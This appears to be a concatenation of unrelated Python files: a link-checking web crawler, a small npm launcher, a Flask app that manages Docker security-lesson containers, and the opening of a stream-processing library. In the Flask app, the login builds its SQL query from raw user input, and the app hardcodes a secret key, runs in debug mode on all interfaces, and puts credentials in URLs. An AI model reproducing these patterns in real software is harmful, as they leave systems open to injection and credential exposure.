self.url_queue.remove_visited_url(website_url)
self.url_queue.add_unvisited_url(website_url)
def load_config(self, config_file):
if config_file:
if not os.path.isabs(config_file):
config_file = os.path.join(os.getcwd(), config_file)
else:
config_file = os.path.join(os.path.dirname(__file__), 'default_config.yml')
config_dict = helpers.load_yaml_file(config_file)
self.kwargs = {
'headers': config_dict.get('headers', {}),
'cookies': {}
}
self.url_type_config = config_dict.get('Content-Type', {})
self.user_agent = self.kwargs["headers"].get('User-Agent', {})
self.kwargs['timeout'] = config_dict.get('default_timeout', 20)
whitelist_configs = config_dict.get('whitelist', {})
self.whitelist_host = whitelist_configs.get('host', [])
self.whitelist_fullurls = whitelist_configs.get('fullurl', [])
self.whitelist_include_keys = whitelist_configs.get('include-key', [])
self.whitelist_startswith_strs = whitelist_configs.get('startswith', [])
self.grey_env = False
def set_grey_env(self, user_agent, traceid, view_grey):
self.kwargs['headers']['User-Agent'] = user_agent
self.kwargs['cookies']['traceid'] = traceid
self.kwargs['cookies']['view_grey'] = view_grey
self.grey_env = True
self.grey_user_agent = user_agent
def get_user_agent_by_url(self, url):
if '//m.' in url:
# e.g. http://m.debugtalk.com
return self.user_agent['mobile']
else:
return self.user_agent['www']
def parse_url(self, url, referer_url):
url = url.strip()
if url == "":
return None
for ignore_url_startswith_str in self.whitelist_startswith_strs:
if url.startswith(ignore_url_startswith_str):
return None
if url.startswith('\\"'):
# \\"https:\\/\\/store.debugtalk.com\\/guides\\/"
url = url.encode('utf-8').decode('unicode_escape')\
.replace(r'\/', r'/').replace(r'"', r'')
return url
parsed_url = helpers.make_url_with_referer(url, referer_url)
return parsed_url
def get_url_type(self, resp, req_host):
if req_host not in self.include_hosts_set:
url_type = 'external'
return url_type
content_type = resp.headers.get('Content-Type', None)
if content_type and content_type in self.url_type_config.get('static', []):
url_type = 'static'
else:
url_type = 'recursive'
return url_type
def parse_urls(self, urls_set, referer_url):
parsed_urls_set = set()
for url in urls_set:
parsed_url = self.parse_url(url, referer_url)
if parsed_url is None:
continue
parsed_urls_set.add(parsed_url)
return parsed_urls_set
def parse_page_links(self, referer_url, content):
""" parse a web pages and get all hyper links.
"""
raw_links_set = set()
try:
etree = lxml.html.fromstring(content)
except lxml.etree.ParserError:
return raw_links_set
link_elements_list = etree.xpath("//link|//a|//script|//img")
for link in link_elements_list:
url = link.get('href') or link.get('src')
if url is None:
continue
raw_links_set.add(url)
parsed_urls_set = self.parse_urls(raw_links_set, referer_url)
return parsed_urls_set
def save_categorised_url(self, status_code, url):
""" save url by status_code category
"""
if status_code not in self.categorised_urls:
self.categorised_urls[status_code] = set()
self.categorised_urls[status_code].add(url)
def _print_log(self, depth, url, status_code, duration_time):
self.test_counter += 1
color_logging(
"test_counter: {}, depth: {}, url: {}, cookie: {}, status_code: {}, duration_time: {}s"
.format(self.test_counter, depth, url, self.cookie_str, status_code, round(duration_time, 3)), 'DEBUG')
def is_url_has_whitelist_key(self, url):
for key in self.whitelist_include_keys:
if key in url:
return True
return False
def get_hyper_links(self, url, depth, retry_times=3):
if url in self.whitelist_fullurls:
return set()
hyper_links_set = set()
kwargs = copy.deepcopy(self.kwargs)
if not self.grey_env:
kwargs['headers']['User-Agent'] = self.get_user_agent_by_url(url)
parsed_object = helpers.get_parsed_object_from_url(url)
url_host = parsed_object.netloc
if url_host in self.whitelist_host:
return set()
if self.is_url_has_whitelist_key(url):
return set()
if url_host in self.auth_dict and self.auth_dict[url_host]:
kwargs['auth'] = self.auth_dict[url_host]
exception_str = ""
status_code = '0'
resp_content_md5 = None
duration_time = 0
try:
start_time = time.time()
resp = requests.head(url, **kwargs)
url_type = self.get_url_type(resp, url_host)
""" If this is not a html page of the domain, do not download it.
"""
if url_type in ['static', 'external']:
if resp.status_code in [301, 302, 404, 500]:
# some links can not be visited with HEAD method and will return 404 status code
# so we recheck with GET method here.
start_time = time.time()
resp = requests.get(url, **kwargs)
duration_time = time.time() - start_time
status_code = str(resp.status_code)
else:
# recursive
start_time = time.time()
resp = requests.get(url, **kwargs)
duration_time = time.time() - start_time
resp_content_md5 = helpers.get_md5(resp.content)
hyper_links_set = self.parse_page_links(resp.url, resp.content)
if url not in self.web_urls_mapping:
self.web_urls_mapping[url] = list(hyper_links_set)
status_code = str(resp.status_code)
self.url_queue.add_unvisited_urls(hyper_links_set)
if resp.status_code > 400:
exception_str = 'HTTP Status Code is {}.'.format(status_code)
"""Add scraping here.
"""
self.scrape_request(resp.content, url);
except requests.exceptions.SSLError as ex:
color_logging("{}: {}".format(url, str(ex)), 'WARNING')
exception_str = str(ex)
status_code = 'SSLError'
retry_times = 0
except requests.exceptions.ConnectionError as ex:
color_logging("ConnectionError {}: {}".format(url, str(ex)), 'WARNING')
exception_str = str(ex)
status_code = 'ConnectionError'
except requests.exceptions.Timeout:
time_out = kwargs['timeout']
color_logging("Timeout {}: Timed out for {} seconds".format(url, time_out), 'WARNING')
exception_str = "Timed out for {} seconds".format(time_out)
status_code = 'Timeout'
except requests.exceptions.InvalidSchema as ex:
color_logging("{}: {}".format(url, str(ex)), 'WARNING')
exception_str = str(ex)
status_code = 'InvalidSchema'
retry_times = 0
except requests.exceptions.ChunkedEncodingError as ex:
color_logging("{}: {}".format(url, str(ex)), 'WARNING')
exception_str = str(ex)
status_code = 'ChunkedEncodingError'
retry_times = 0
except requests.exceptions.InvalidURL as ex:
color_logging("{}: {}".format(url, str(ex)), 'WARNING')
exception_str = str(ex)
status_code = 'InvalidURL'
retry_times = 0
except lxml.etree.XMLSyntaxError as ex:
color_logging("{}: {}".format(url, str(ex)), 'WARNING')
exception_str = str(ex)
status_code = 'XMLSyntaxError'
retry_times = 0
self._print_log(depth, url, status_code, duration_time)
if retry_times > 0:
if not status_code.isdigit() or int(status_code) > 400:
time.sleep((4-retry_times)*2)
return self.get_hyper_links(url, depth, retry_times-1)
else:
self.bad_urls_mapping[url] = exception_str
self.save_categorised_url(status_code, url)
url_test_res = {
'status_code': status_code,
'duration_time': duration_time,
'md5': resp_content_md5
}
self.url_queue.add_visited_url(url, url_test_res)
return hyper_links_set
def get_referer_urls_set(self, url):
""" get all referer urls of the specified url.
"""
referer_set = set()
for parent_url, hyper_links_set in self.web_urls_mapping.items():
if url in hyper_links_set:
referer_set.add(parent_url)
return referer_set
def get_sorted_categorised_urls(self):
return OrderedDict(
sorted(self.categorised_urls.items(), reverse=True)
).items()
def print_categorised_urls(self):
'''
Print error URLs been classified by HTTP error code,named as HTTP code error block.
In HTTP code error block, URLs been classified by HOST.
URLs defined as the URL of which page contains the error links,instead of error link.
'''
def _print(status_code, urls_list, log_level, show_referer=False):
if isinstance(status_code, str):
output = "{}: {}.\n".format(status_code, len(urls_list))
elif isinstance(status_code, int):
output = "HTTP status code {}, total: {}.\n".format(status_code, len(urls_list))
host_dict = {}
for url in urls_list:
referer_url_list = list(self.get_referer_urls_set(url))
if referer_url_list and referer_url_list is not []:
host_url = referer_url_list[0].split("/")[2]
else:
host_url = "root"
if host_url in host_dict:#Build {host:[url_list]}
temp_list = host_dict[host_url]
temp_list.append(url)
host_dict[host_url] = temp_list
else:
temp_list = []
temp_list.append(url)
host_dict[host_url] = temp_list
output += "urls list: \n"
for host in host_dict:
output += "---HOST: " + host + "\n"
for url in host_dict[host]:
output += url
if not str(status_code).isdigit():
output += ", {}: {}".format(status_code, self.bad_urls_mapping[url])
pass
if show_referer:
# only show 5 referers if referer urls number is greater than 5
referer_urls = self.get_referer_urls_set(url)
referer_urls_num = len(referer_urls)
if referer_urls_num > 5:
referer_urls = list(referer_urls)[:5]
output += ", referer_urls: {}".format(referer_urls)
output += " total {}, displayed 5.".format(referer_urls_num)
else:
output += ", referer_urls: {}".format(referer_urls)
output += '\n'
color_logging(output, log_level)
for status_code, urls_list in self.get_sorted_categorised_urls():
color_logging('-' * 120)
if status_code.isdigit():
status_code = int(status_code)
if status_code >= 500:
_print(status_code, urls_list, 'ERROR', True)
elif status_code >= 400:
_print(status_code, urls_list, 'ERROR', True)
elif status_code >= 300:
_print(status_code, urls_list, 'WARNING')
elif status_code > 200:
_print(status_code, urls_list, 'INFO')
else:
_print(status_code, urls_list, 'ERROR', True)
def run_dfs(self, max_depth):
""" start to run test in DFS mode.
"""
def crawler(url, depth):
""" DFS crawler
"""
if depth > max_depth:
return
if self.url_queue.is_url_visited(url):
urls = set()
else:
urls = self.get_hyper_links(url, depth)
for url in urls:
crawler(url, depth+1)
while not self.url_queue.is_unvisited_urls_empty():
url = self.url_queue.get_one_unvisited_url()
crawler(url, self.current_depth)
def run_bfs(self, max_depth):
""" start to run test in BFS mode.
"""
while self.current_depth <= max_depth:
while not self.url_queue.is_unvisited_urls_empty():
url = self.url_queue.get_one_unvisited_url()
self.current_depth_unvisited_urls_queue.put_nowait(url)
self.current_depth_unvisited_urls_queue.join()
self.current_depth += 1
def visit_url(self):
while True:
try:
url = self.current_depth_unvisited_urls_queue.get()
""" Have the url, les do the action over this.
Decorator with the features? Or only process args? Anyway apply the advances scraping tech.
"""
if self.respect_robots and self.rp.can_fetch(self.get_user_agent_by_url(url), url):
self.get_hyper_links(url, self.current_depth)
finally:
self.current_depth_unvisited_urls_queue.task_done()
def create_threads(self, concurrency):
for _ in range(concurrency):
thread = threading.Thread(target=self.visit_url)
thread.daemon = True
thread.start()
def start(self, cookies={}, crawl_mode='BFS', max_depth=10, concurrency=None):
""" start to run test in specified crawl_mode.
@params
crawl_mode = 'BFS' or 'DFS'
"""
concurrency = int(concurrency or multiprocessing.cpu_count() * 4)
info = "Start to run test in {} mode, cookies: {}, max_depth: {}, concurrency: {}, respect_robots: {}"\
.format(crawl_mode, cookies, max_depth, concurrency, self.respect_robots)
color_logging(info)
self.reset_all()
self.create_threads(concurrency)
self.kwargs['cookies'].update(cookies)
self.cookie_str = '_'.join(['_'.join([key, cookies[key]]) for key in cookies])
if crawl_mode.upper() == 'BFS':
self.run_bfs(max_depth)
else:
self.run_dfs(max_depth)
color_logging('=' * 120, color='yellow')
def print_result(self, canceled=False, save_results=False):
status = "Canceled" if canceled else "Finished"
color_logging("{}. The crawler has tested {} urls."\
.format(status, self.url_queue.get_visited_urls_count()))
self.print_categorised_urls()
if save_results:
urls_mapping_log_path = os.path.join(self.logs_folder, 'urls_mapping.yml')
helpers.save_to_yaml(self.web_urls_mapping, urls_mapping_log_path)
color_logging("Save urls mapping in YAML file: {}".format(urls_mapping_log_path))
visited_urls_log_path = os.path.join(self.logs_folder, 'visited_urls.yml')
helpers.save_to_yaml(self.url_queue.get_visited_urls(), visited_urls_log_path)
color_logging("Save visited urls in YAML file: {}".format(visited_urls_log_path))
def get_mail_content_ordered_dict(self):
website_urls = [website['url'] for website in self.website_list]
mail_content_ordered_dict = OrderedDict({
"Tested websites": ','.join(website_urls),
"Total tested urls number": self.url_queue.get_visited_urls_count(),
"===== Detailed": "Statistics ====="
})
flag_code = 0
for status_code, urls_list in self.get_sorted_categorised_urls():
if status_code.isdigit():
mail_content_ordered_dict["status code {}".format(status_code)] = len(urls_list)
if int(status_code) > 400:
flag_code = 1
else:
mail_content_ordered_dict[status_code] = len(urls_list)
flag_code = 1
return mail_content_ordered_dict, flag_code
|
scriptrun.py
|
import os
import sh
import time
import threading
def invokenpm():
os.system("sudo npm start")
def invokeBrowser():
os.system("google-chrome http://localhost:8081/index.html")
t1 = threading.Thread(target=invokenpm, args=())
t2 = threading.Thread(target=invokeBrowser, args=())
t2.start()
enter_view = input("view number")
if(enter_view == 1 ):
sh.cd('/home/upadhyatejas/Hackday/Index')
print(sh.pwd())
t1 = threading.Thread(target=invokenpm, args=())
t1.start()
elif (enter_view == 2):
sh.cd('/home/upadhyatejas/Hackday/Lesson-Information')
print(sh.pwd())
t1 = threading.Thread(target=invokenpm, args=())
t1.start()
else:
sh.cd('/home/upadhyatejas/Hackday/Quiz')
t1 = threading.Thread(target=invokenpm, args=())
t1.start()
print("done with excecution")
|
client.py
|
import os
import re
import ast
import sys
import json
import uuid
import MySQLdb
import functools
import threading
import subprocess
import unicodedata
import flask, flask.views
app = flask.Flask(__name__)
# Don't do this!
app.secret_key = "bacon"
#get app directory
loc = os.getcwd()+"/"
#variables for registry
registry = ""
regmail = ""
reguser = ""
regpas = ""
#variables for databse access
dbhost = ""
dbuser = ""
dbpasswd = ""
#read config.txt file
with open(loc+"static/configs/config.txt") as f:
details = f.read()
f.close()
for line in details.splitlines():
line = line.split()
if line == []:
pass
elif line[0] == "registry":
registry = line[2]
elif line[0] == "regmail":
regmail = line[2]
elif line[0] == "reguser":
reguser = line[2]
elif line[0] == "regmail":
regmail = line[2]
elif line[0] == "regpas":
regpas = line[2]
elif line[0] == "dbhost":
dbhost = line[2]
elif line[0] == "dbuser":
dbuser = line[2]
elif line[0] == "dbpasswd":
dbpasswd = line[2]
grps = []
radio1 = ''
radio2 = ''
search1 = ''
search2 = ''
dld = []
dld_lsn = []
output = []
def executer(cmd):
p = subprocess.Popen(cmd, stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out, err = p.communicate()
return out, err
def thread_executer(cmd):
global dld
print "in thread",cmd
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out, err = p.communicate()
temp=out.splitlines()[-2].split()[0]
if temp=='Digest:':
dld.remove(cmd[-1])
def downloader(cmd,image,info):
global dld,loc
dld.append(image)
print "Downloading ",image
out,err = executer(cmd)
print "finished dld ",image
if 'Digest' in out:
try:
cmd = ['docker','tag',cmd[2],image]
out,err = executer(cmd)
try:
print loc+"static/lessons/"+image.replace('/','-')
with open(loc+"static/lessons/"+image.replace('/','-'),'w') as f:
f.write(info[0]+"\n"+info[1])
f.close()
except:
print "error writing file -",image
except:
print "error renaming ",image
else:
print "failed downloading",image
while image in dld : dld.remove(image)
print "exiting ",image
def add_lesson(old_lesn,lesn,index,line,info):
global dld,loc
global dld_lsn
flag = 1
print "enter loop - add_lesson"
while flag:
flag = 0
for item in index:
if item in dld:
flag = 1
print "exit loop - add_lesson"
dld_lsn.remove(old_lesn)
target = loc+'static/configs/lesson.txt'
try:
cmd=['grep','^'+lesn+' ',target]
val,err = executer(cmd)
#add or replace line in the configs/lesson.txt file
if val:
print "Replacing line"
cmd=['sed','-i','/^'+lesn+' /c '+line,target]
val = executer(cmd)
else:
print "Adding line"
with open(target, 'a') as f:
f.write(line)
f.close()
#add description about lesson in the static/lessons/ folder
with open(loc+'static/lessons/'+lesn,'w') as f:
f.write(info[0]+'\n'+info[1])
f.close()
except:
print "error writing file",lesn
def thread_executer_2(cmd,args):
global dld
print "in thread",cmd
if args[0] == 'play':
try:
f = open(cmd[2],'w')
f.write(args[1])
f.close()
f = open(cmd[3],'w')
f.write(args[2])
f.close()
except:
print "Error creating playbook ",cmd
p = subprocess.Popen(cmd,shell=False,stdin=None,stdout=None,stderr=None,close_fds=True)
print "out of process",cmd
def reader(fname):
index=[]
try:
with open(fname) as f:
index = f.read().splitlines()
f.close()
except:
pass
return index
def db_ops(cmds,arg):
global dbuser, dbpasswd, dbhost
db = MySQLdb.connect(host=dbhost,
user=dbuser,
passwd=dbpasswd,
db="lense")
cur = db.cursor()
for cmd in cmds:
cur.execute(cmd)
result = cur.fetchall()
#commit if arg = 1
if arg == 1:
db.commit()
#return the results
return result
db.close()
def filechecker():
#check and create lessons.txt if doesnot exist already
path="static/configs/lesson.txt"
if not os.path.exists(path):
print "asdad"
fh = open(path, "w")
fh.write(' ')
fh.close()
class Main(flask.views.MethodView):
def get(self):
return flask.render_template('index.html')
def post(self):
flag = []
if 'logout' in flask.request.form:
flask.session.pop('username', None)
return flask.redirect(flask.url_for('index'))
required = ['username', 'passwd']
for r in required:
if r not in flask.request.form:
flask.flash("Error: {0} is required.".format(r))
return flask.redirect(flask.url_for('index'))
username = flask.request.form['username']
passwd = flask.request.form['passwd']
cmd = "SELECT * FROM users WHERE passwd='"+passwd+"' AND uname='"+username+"'"
flag=db_ops([cmd],0)
#flag = 1
#check if all files are available
filechecker()
#if username in users and users[username] == passwd:
if flag:
flask.session['username'] = username
with open('/tmp/.esnel','w') as f:
f.write(username)
f.close()
else:
flask.flash("Username doesn't exist or incorrect password")
return flask.redirect(flask.url_for('home'))
def login_required(method):
@functools.wraps(method)
def wrapper(*args, **kwargs):
if 'username' in flask.session:
return method(*args, **kwargs)
else:
flask.flash("A login is required to proceed!")
return flask.redirect(flask.url_for('index'))
return wrapper
class Repo(flask.views.MethodView):
@login_required
def get(self):
global dld_lsn
global dld
global registry,regmail,reguser,regpas
#dld=['lesson3']
cmd=['curl','https://'+reguser+':'+regpas+'@'+registry+'/v2/_catalog']
out1, out2 = executer(cmd)
temp = {'index':{},'lesns':{},'comps':{},'dld':dld,'dld_lsn':dld_lsn}
try:
images= ast.literal_eval(out1.splitlines()[0])['repositories']
for image in images:
#check if description for component exist and add it to temp
#cmd=['curl','http://test:user@registry.cs.uno.edu/'+image.replace('/','-')]
cmd=['curl','http://'+reguser+':'+regpas+'@'+registry+'/'+image.replace('/','-')]
out1, out2 = executer(cmd)
desc=out1.splitlines()
if desc[0]!='<html>' and desc[0]!='':
temp['comps'][image]=[desc[0],'\n'.join(desc[1:])]
#check if description for lesson exist and add it to temp, if absent
image=image.split('/')[0]
try:
if temp['lesns'][image]:
pass
except:
#cmd=['curl','http://test:user@registry.cs.uno.edu/'+image]
cmd=['curl','http://'+reguser+':'+regpas+'@'+registry+'/'+image]
out1, out2 = executer(cmd)
desc=out1.splitlines()
if desc[0]!='<html>' and desc[0]!='':
temp['lesns'][image]=[desc[0],'\n'.join(desc[1:])]
#check if index for lesson exist and add to temp, if absent
try:
if temp['index'][image]:
pass
except:
#cmd=['curl','http://test:user@registry.cs.uno.edu/'+image+'_index']
cmd=['curl','http://'+reguser+':'+regpas+'@'+registry+'/'+image+'_index']
out1, out2 = executer(cmd)
desc=out1.splitlines()[0]
if desc!='<html>' and desc!='':
temp['index'][image]=desc
else:
temp['lesns'][image]=['n/a','n/a']
else:
temp['comps'][image]=['n/a','n/a']
except:
print "some error in getting repo data"
result = temp
print result
flask.flash(result)
return flask.render_template('repo.html')
@login_required
def post(self):
global dld_lsn
global loc
global registry,regmail,reguser,regpas
flag = 0
#login to the registry server
#cmd = ['docker','login','-u','test','-p','user','--email="unotest3@gmail.com"','https://registry.cs.uno.edu']
cmd = ['docker','login','-u',reguser,'-p',regpas,'--email="'+regmail+'"','https://'+registry]
out1,out2=executer(cmd)
try:
request = flask.request.form['lesn']
request = ast.literal_eval(request)
lesn = request[0]
cont = request[1]
#info = cont['comps'][image]
flag = 1
except:
request = flask.request.form['comp']
request = ast.literal_eval(request)
image = request[0]
cont = request[1]
info = cont['comps'][image]
#download just the component image from the registry server in a thread
cmd = ['docker','pull',registry+'/'+image]
t = threading.Thread(name='child procs', target=downloader, args=[cmd,image,info])
t.daemon = True
t.start()
#return to back to web page
return flask.redirect(flask.url_for('repo'))
#add code if lesson is to be saved under a new name
new_lsn = lesn
#add lesson to the download list for lessons
dld_lsn.append(lesn)
#print lesn,'\n', cont
new_cont = []
for comp in cont['index'][lesn].split()[1:]:
print "loop main",comp
image1 = comp.replace(lesn,new_lsn)
image = image1.replace('-','/')
new_cont.append(image1)
#download image from the registry server in a thread
cmd = ['docker','pull',registry+'/'+image]
info = cont['comps'][image]
t = threading.Thread(name='child procs', target=downloader, args=[cmd,image,info])
t.daemon = True
t.start()
#get description from POST and other attributes required for the lesson
desc = cont['lesns'][lesn]
line = new_lsn+' '+' '.join(new_cont)
index = new_cont
t = threading.Thread(name='child procs', target=add_lesson, args=[lesn,new_lsn,index,line,desc])
t.daemon = True
t.start()
return flask.redirect(flask.url_for('repo'))
class Home(flask.views.MethodView):
@login_required
def get(self):
global loc
#index2 {'lesson1': {'status': 'Y', 'comps': {'lesson1/comp1': {'status': ['Y'], 'index': ['lesson1/comp1', 'latest', '252f198a8beb', 'ago 380MB', 'Y', []], 'desc': ['Web Server', 'LAMP server hosting a PHP webpage.']}}, 'desc': ['SQL Injection to Shell II', 'This exercise explains how you can, from a blind SQL injection, gain access to the administration console. Then once in the administration console, how you can run commands on the system. ']}}
#check if all files are available
filechecker()
#---------------------------------
#check for status of containers
cmd = ['docker', 'ps', '-a']
out1, out2 = executer(cmd)
index3={}
index4=[]
tag = ""
if out1:
temp2=[]
temp3=[]
flag=0
for line in out1.splitlines():
if 'lesson' in line:
var1=line.split()
if var1[var1.index('ago')+1] == 'Up':
index3[var1[-1]]=[var1[1],'Y']
else:
index3[var1[-1]]=[var1[1],'S']
index4.append(var1[-1])
print "Home",index3,index4
index1={}
temp2=[]
#check downloaded images
cmd = ['docker', 'images']
out1, out2 = executer(cmd)
for line in out1.splitlines():
temp3 = []
flags = []
temp = line.split()
if line.startswith('lesson'):
status=''
#555 history command no longer gives you image id of intermediate containers
cmd = ["docker","history","--no-trunc",temp[0]]
temp2=executer(cmd)
image = []
flags = 0
for step in temp2[0].splitlines():
if '"@STEP@' in step:
step = step.split()
image = step[0][0:3]
temp1=[]
try:
temp1=index3[temp[0].replace('/','-')]
if image == temp1[0] :
#print temp1
flags=temp1[1]
else:
temp1=['','']
except:
temp1=['','']
temp3.append([image,temp1[1],' '.join(step[step.index('"@STEP@')+1:-2])[:-1]])
if image:
temp[2]=image
if not flags:
try:
flags=index3[temp[0].replace('/','-')][1]
except:
flags='N'
index1[temp[0]]=[temp[0],temp[1],temp[2],' '.join(temp[-2:]),flags,temp3[::-1]]
print "index",index1
temp=[]
index2={}
fname=loc+'static/configs/lesson.txt'
with open(fname) as f:
temp=f.read().splitlines()
for item in temp:
count1 = count2 = 0
item = item.split()
index2[item[0]]={}
if True:
#check files and add the lesson title and description
try:
fbuf=[]
fname=loc+'static/lessons/'+item[0]
with open(fname) as f:
fbuf=f.read().splitlines()
index2[item[0]]['desc']=[fbuf[0],''.join(fbuf[1:])]
except:
index2[item[0]]['desc']=['','']
index2[item[0]]['comps']={}
index2[item[0]]['status']=''
#print item,index2
for key in item[1:]:
#check files and add the component title and description
print "--",key
try:
fbuf=[]
fname='static/lessons/'+key
with open(fname) as f:
fbuf=f.read().splitlines()
comp_desc = [fbuf[0],''.join(fbuf[1:])]
except:
comp_desc = ['','']
ip = 'n/a'
try:
temp3=index1[key.replace('-','/')]
if temp3[4]=='Y':
cmd = ['docker','inspect','--format','{{ .NetworkSettings.IPAddress}}',key]
ip,err = executer(cmd)
ip = ip.rstrip()
count1+=1
elif temp3[4]=='N':
count2+=1
except:
temp3=[]
index2[item[0]]['comps'][key.replace('-','/')]={'index':temp3,'desc':comp_desc,'status':[temp3[4]],'network':[ip]}
#print key,comp_desc,temp3
#print index2
print item[1:],count1,count2
if count1 == len(item[1:]):
index2[item[0]]['status']='Y'
elif count2 == len(item[1:]) :
index2[item[0]]['status']='N'
else:
index2[item[0]]['status']='S'
#print "new"
#print index3
#print index1
print "index2",index2
flask.flash(index2,'lesson')
return flask.render_template('home.html')
@login_required
def post(self):
request = flask.request.form
result = {}
temp1 = []
temp2 = []
print request
try:
if request['start-all']:
print request['start-all']
try:
temp=ast.literal_eval(request['start-all'])
targets=temp.keys()
except:
pass
print targets
for cont in targets:
image = temp[cont]['index'][2]
print "starting container ",cont,image
cmd = ['docker', 'run', '-Pitd', '--name='+cont.replace('/','-'), image]
out1, out2 = executer(cmd)
print "out-",cont,out2
except:
try:
if request['stop-all']:
try:
temp=ast.literal_eval(request['stop-all'])
request=temp.keys()
except:
request=[request['stop-all']]
print "stop all containers ",request
for cont in request:
cont = cont.replace('/','-')
print "stopping container "+cont
cmd = ['docker', 'stop', cont]
out1, out2 = executer(cmd)
except:
try:
if request['reset-all']:
try:
conts = ast.literal_eval(request['reset-all'])
targets = conts.keys()
except:
targets = [request['reset-all']]
for cont in targets:
print "resetting container ",cont
try:
cmd = ['docker','rm','-f', cont.replace('/','-')]
out1, out2 = executer(cmd)
except:
pass
except :
try:
if request['jump']:
request = ast.literal_eval(request['jump'])
key = request.keys()[0]
target = request[key][0]
print key,target
try:
cmd = ['docker', 'rm','-f',key.replace('/','-')]
out1, out2 = executer(cmd)
print cmd
cmd = ['docker', 'run','-itd','-P','--name='+key.replace('/','-'),target]
print cmd
out1, out2 = executer(cmd)
except:
print "error in jump - \n",out2
except:
try:
if request['restart-all']:
vals=[]
try:
conts = ast.literal_eval(request['restart-all'])
targets = conts.keys()
except:
targets = [request['restart-all']]
for cont in targets:
print "restarting container ",cont
try:
cmd = ['docker','restart', cont.replace('/','-')]
out1, out2 = executer(cmd)
except:
print "error restarting",cont
except:
try:
if request['connect']:
temp=ast.literal_eval(request['connect'])
conts=temp[0].replace('/','-')
title=temp[0].split('-')[0]+' '+temp[1]
print "connect to container "+conts,title
try:
cmd='docker attach '+conts
subprocess.Popen(['xterm','-T',title,'-e',cmd])
except:
print "error at xterm"
except:
e = sys.exc_info()[0]
print "Exception", e
return flask.redirect(flask.url_for('home'))
class Custom(flask.views.MethodView):
@login_required
def get(self):
print "asd"
@login_required
def post(self):
print "asd"
app.add_url_rule('/',
view_func=Main.as_view('index'),
methods=["GET", "POST"])
app.add_url_rule('/home/',
view_func=Home.as_view('home'),
methods=['GET', 'POST'])
app.add_url_rule('/repo/',
view_func=Repo.as_view('repo'),
methods=['GET', 'POST'])
app.debug = True
app.run(host='0.0.0.0')
|
core.py
|
from __future__ import absolute_import, division, print_function
from collections import deque, defaultdict
from datetime import timedelta
import functools
import logging
import six
import sys
import threading
from time import time
import weakref
import toolz
from tornado import gen
from tornado.locks import Condition
from tornado.ioloop import IOLoop
from tornado.queues import Queue
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from collections.abc import Iterable
from .compatibility import get_thread_identity
from .orderedweakset import OrderedWeakrefSet
no_default = '--no-default--'
_global_sinks = set()
_html_update_streams = set()
thread_state = threading.local()
logger = logging.getLogger(__name__)
_io_loops = []
def get_io_loop(asynchronous=None):
if asynchronous:
return IOLoop.current()
if not _io_loops:
loop = IOLoop()
thread = threading.Thread(target=loop.start)
thread.daemon = True
thread.start()
_io_loops.append(loop)
return _io_loops[-1]
def identity(x):
return x
class RefCounter:
""" A counter to track references to data
This class is used to track how many nodes in the DAG are referencing
a particular element in the pipeline. When the count reaches zero,
then parties interested in knowing if data is done being processed are
notified
Parameters
----------
initial: int, optional
The initial value of the reference counter
cb: callable
The function to use a callback when the reference count reaches zero
loop: tornado.ioloop.IOLoop
The loop on which to create a callback when the reference count
reaches zero
"""
def __init__(self, initial=0, cb=None, loop=None):
self.loop = loop if loop else get_io_loop()
self.count = initial
self.cb = cb
def retain(self, n=1):
"""Retain the reference
Parameters
----------
n: The number of times to retain the reference
"""
self.count += n
def release(self, n=1):
"""Release the reference
If the reference count is equal to or less than zero, the callback, if
provided will added to the provided loop or default loop
Parameters
----------
n: The number of references to release
"""
self.count -= n
if self.count <= 0 and self.cb:
self.loop.add_callback(self.cb)
def __str__(self):
return '<RefCounter count={}>'.format(self.count)
__repr__ = __str__
class Stream(object):
""" A Stream is an infinite sequence of data.
Streams subscribe to each other passing and transforming data between them.
A Stream object listens for updates from upstream, reacts to these updates,
and then emits more data to flow downstream to all Stream objects that
subscribe to it. Downstream Stream objects may connect at any point of a
Stream graph to get a full view of the data coming off of that point to do
with as they will.
Parameters
----------
stream_name: str or None
This is the name of the stream.
asynchronous: boolean or None
Whether or not this stream will be used in asynchronous functions or
normal Python functions. Leave as None if you don't know.
True will cause operations like emit to return awaitable Futures
False will use an Event loop in another thread (starts it if necessary)
ensure_io_loop: boolean
Ensure that some IOLoop will be created. If asynchronous is None or
False then this will be in a separate thread, otherwise it will be
IOLoop.current
Examples
--------
>>> def inc(x):
... return x + 1
>>> source = Stream() # Create a stream object
>>> s = source.map(inc).map(str) # Subscribe to make new streams
>>> s.sink(print) # take an action whenever an element reaches the end
>>> L = list()
>>> s.sink(L.append) # or take multiple actions (streams can branch)
>>> for i in range(5):
... source.emit(i) # push data in at the source
'1'
'2'
'3'
'4'
'5'
>>> L # and the actions happen at the sinks
['1', '2', '3', '4', '5']
"""
_graphviz_shape = 'ellipse'
_graphviz_style = 'rounded,filled'
_graphviz_fillcolor = 'white'
_graphviz_orientation = 0
str_list = ['func', 'predicate', 'n', 'interval']
def __init__(self, upstream=None, upstreams=None, stream_name=None,
loop=None, asynchronous=None, ensure_io_loop=False):
self.downstreams = OrderedWeakrefSet()
if upstreams is not None:
self.upstreams = list(upstreams)
else:
self.upstreams = [upstream]
self._set_asynchronous(asynchronous)
self._set_loop(loop)
if ensure_io_loop and not self.loop:
self._set_asynchronous(False)
if self.loop is None and self.asynchronous is not None:
self._set_loop(get_io_loop(self.asynchronous))
for upstream in self.upstreams:
if upstream:
upstream.downstreams.add(self)
self.name = stream_name
def _set_loop(self, loop):
self.loop = None
if loop is not None:
self._inform_loop(loop)
else:
for upstream in self.upstreams:
if upstream and upstream.loop:
self.loop = upstream.loop
break
def _inform_loop(self, loop):
"""
Percolate information about an event loop to the rest of the stream
"""
if self.loop is not None:
if self.loop is not loop:
raise ValueError("Two different event loops active")
else:
self.loop = loop
for upstream in self.upstreams:
if upstream:
upstream._inform_loop(loop)
for downstream in self.downstreams:
if downstream:
downstream._inform_loop(loop)
def _set_asynchronous(self, asynchronous):
self.asynchronous = None
if asynchronous is not None:
self._inform_asynchronous(asynchronous)
else:
for upstream in self.upstreams:
if upstream and upstream.asynchronous:
self.asynchronous = upstream.asynchronous
break
def _inform_asynchronous(self, asynchronous):
"""
Percolate information about an event loop to the rest of the stream
"""
if self.asynchronous is not None:
if self.asynchronous is not asynchronous:
raise ValueError("Stream has both asynchronous and synchronous elements")
else:
self.asynchronous = asynchronous
for upstream in self.upstreams:
if upstream:
upstream._inform_asynchronous(asynchronous)
